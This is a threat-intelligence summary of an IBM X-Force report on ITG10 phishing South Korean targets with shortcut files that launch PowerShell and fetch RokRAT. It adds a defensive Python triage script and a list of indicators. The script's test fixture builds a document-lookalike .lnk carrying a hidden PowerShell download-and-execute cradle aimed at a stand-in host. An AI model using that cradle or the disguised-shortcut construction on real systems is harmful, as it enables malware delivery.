ITG10 Likely Targeting South Korean Entities of Interest to the Democratic People's Republic of Korea (DPRK)

2023-06-06 IBM

https://securityintelligence.com/posts/itg10-targeting-south-korean-entities/

IBM X-Force reports that ITG10, whose TTPs overlap with those of APT37 and ScarCruft, likely ran an April 2023 phishing campaign against South Korean government, communications, education, think-tank, dissident, and foreign-policy targets. The campaign delivered ZIP attachments containing LNK shortcut files disguised as documents; the lures included Korean parliamentary and seminar themes as well as energy- and construction-themed decoys. Opening a shortcut executed obfuscated PowerShell, and that PowerShell chain downloaded second-stage RokRAT shellcode. RokRAT can execute commands issued by its C2, exfiltrate data, transfer files, and log keystrokes. X-Force links the lure themes to DPRK interests around the Korean peninsula and to South Korea's overseas construction and energy ties.
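The first stage described above (a ZIP whose LNK members pose as documents and launch obfuscated PowerShell) is the part an analyst can triage offline before any payload is fetched. The script below is an added example written for this page, not code from IBM X-Force or from the report: it walks a ZIP, parses each .lnk with a minimal MS-SHLLINK parser (header, optional IDList and LinkInfo, then the StringData fields), flags shortcuts whose name carries a document extension before .lnk, and decodes any PowerShell -EncodedCommand argument. The sample ZIP, the shortcut, the decoy command, the example.invalid URL and the double-extension heuristic are all constructed for the demonstration and are not indicators from the campaign.

```python
"""Triage a ZIP attachment for .lnk files masquerading as documents (constructed example)."""
import base64
import io
import re
import struct
import zipfile

# LinkFlags bits, MS-SHLLINK section 2.1.1
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
# CLSID 00021401-0000-0000-C000-000000000046 in on-disk (little-endian GUID) byte order
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
# Document extensions a lure might place before ".lnk" (heuristic chosen for this example)
DOC_EXTS = (".pdf", ".doc", ".docx", ".hwp", ".ppt", ".pptx", ".xls", ".xlsx", ".txt")
# -e / -ec / -enc / -encodedcommand followed by a base64 blob; "-ep bypass" does not match
ENC_RE = re.compile(r"(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def parse_lnk(data):
    """Return the StringData fields of a shell link as a dict (minimal MS-SHLLINK parser)."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76  # fixed-size ShellLinkHeader
    if flags & HAS_LINK_TARGET_ID_LIST:  # IDListSize (2 bytes) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:  # LinkInfoSize includes its own 4 bytes
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for bit, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        if flags & bit:  # each StringData item: CountCharacters then the characters
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            if flags & IS_UNICODE:
                fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
                pos += 2 * count
            else:
                fields[name] = data[pos:pos + count].decode("cp1252", "replace")
                pos += count
    return fields


def decode_encoded_command(args):
    """Decode a PowerShell -EncodedCommand argument (base64 of UTF-16LE), or return None."""
    m = ENC_RE.search(args)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def looks_like_document(member_name):
    """True when a .lnk member hides behind a document extension, e.g. 'agenda.pdf.lnk'."""
    return member_name.lower()[:-len(".lnk")].endswith(DOC_EXTS)


def triage_zip(zip_bytes):
    """Report every .lnk member: target, whether it invokes PowerShell, decoded command."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".lnk"):
                continue
            fields = parse_lnk(zf.read(info))
            target = fields.get("relative_path", "")
            args = fields.get("arguments", "")
            findings.append({
                "member": info.filename,
                "document_lookalike": looks_like_document(info.filename),
                "target": target,
                "powershell": "powershell" in (target + " " + args).lower(),
                "decoded_command": decode_encoded_command(args),
            })
    return findings


def build_lnk(relative_path, arguments):
    """Build a minimal Unicode .lnk carrying RELATIVE_PATH and COMMAND_LINE_ARGUMENTS (test fixture)."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sII8s8s8sIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         b"\0" * 8, b"\0" * 8, b"\0" * 8, 0, 0, 1, 0, 0, 0, 0)

    def string_data(text):
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    return header + string_data(relative_path) + string_data(arguments)


# Constructed decoy: a download cradle pointing at a reserved, non-resolving name
DECOY_COMMAND = "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/stage2')"
ENCODED = base64.b64encode(DECOY_COMMAND.encode("utf-16-le")).decode()


def build_sample_zip():
    """Constructed attachment: one document-lookalike shortcut plus a benign text member."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Seminar_Agenda_2023.pdf.lnk", build_lnk(
            r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
            f"-windowstyle hidden -ep bypass -enc {ENCODED}"))
        zf.writestr("readme.txt", b"constructed benign member")
    return buf.getvalue()


if __name__ == "__main__":
    for finding in triage_zip(build_sample_zip()):
        print(finding)
```

The parser deliberately stops at StringData and ignores the ExtraData blocks that follow; for triage the relative path and arguments are what matter, and a shortcut that sets HasLinkTargetIDList instead of a relative path will still be reported with an empty target so the analyst knows to look at the IDList by hand.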

Indicators of Compromise

Type Value First Seen Last Seen
DOMAIN partybbq.co.kr 2023-05-24 2024-11-13
URL https://api.onedrive.com/v1.0/s… 2023-06-06 2023-09-25
URL https://1drv.ms/u/s!AhQMP6eg8aR… 2023-05-01 2023-09-25
DOMAIN xn--vn4b27hka971hbue.kr 2023-06-06 2023-08-28
URL https://1drv.ms/u/s!AjQNLvEE_CU… 2023-05-01 2023-07-13
URL https://api.onedrive.com/v1.0/s… 2023-05-01 2023-07-13
URL https://api.onedrive.com/v1.0/s… 2023-04-21 2023-07-04
URL https://1drv.ms/i/s!AhXEXLJSNMP… 2023-04-21 2023-07-04
HASH 6753933cd54e4eba497c48d63c7418a… 2023-05-01 2023-06-26
HASH 7ef2c0d2ace70fedfe5cd919ad3959c… 2023-06-06 2023-06-06
HASH 5678196f512f8a531c7d85af8df4f40… 2023-06-06 2023-06-06
HASH 9854750f3880c7cee3281d8c33292ca… 2023-06-06 2023-06-06
HASH 7aa7233feb8e8a7b71ae6cdd0ddb8c2… 2023-06-06 2023-06-06
HASH f1289e7229ace984027f29cf8e2dd8f… 2023-06-06 2023-06-06
HASH 5815a6f7976e993fcdf9e024f466704… 2023-06-06 2023-06-06
HASH 7529eaeeb29c713f8e15827c79001a9… 2023-06-06 2023-06-06
HASH 6bab11d9561482777757f16c069ebef… 2023-06-06 2023-06-06
HASH cc6ae9670e38244e439711b1698f0db… 2023-06-06 2023-06-06
HASH 1ec4d60738a671f00089a86eeba6cb1… 2023-06-06 2023-06-06
HASH 50fe8a981a7d4824f0b297f37804b65… 2023-06-06 2023-06-06
HASH ce56b011ac4663a40f0ba606c98c08a… 2023-06-06 2023-06-06
HASH 76d0133d738876f314ae792d0cf9497… 2023-06-06 2023-06-06
HASH fa2ebcdfce8bbe4245ed77b43d39e22… 2023-06-06 2023-06-06
HASH 3d1d2d0464013d9e1dd7611d73176f3… 2023-06-06 2023-06-06
HASH 88c219656f853b2dc54ae02d32a716e… 2023-06-06 2023-06-06
URL https://api.onedrive.com/v1.0/s… 2023-06-06 2023-06-06
URL https://1drv.ms/i/s!AhXEXLJSNMP… 2023-06-06 2023-06-06
HASH cb4c7037c7620e4ce3f8f43161b0ec6… 2023-05-01 2023-06-06
HASH 240e7bd805bd7f2d17217dd4cebc03a… 2023-05-01 2023-06-06
HASH f92297c4efabba98befeb992a009462… 2023-05-01 2023-06-06
HASH 06431a5d8f6262cc3db39d911a920f7… 2023-05-01 2023-06-06
HASH 1c5b9409243bfb81a5924881cc05f63… 2023-05-01 2023-06-06
HASH 00d88009fa50bfab849593291cce20f… 2023-05-01 2023-06-06
URL https://1drv.ms/u/s!Au2my1xh6t8… 2023-04-21 2023-06-06
URL https://api.onedrive.com/v1.0/s… 2023-04-21 2023-06-06
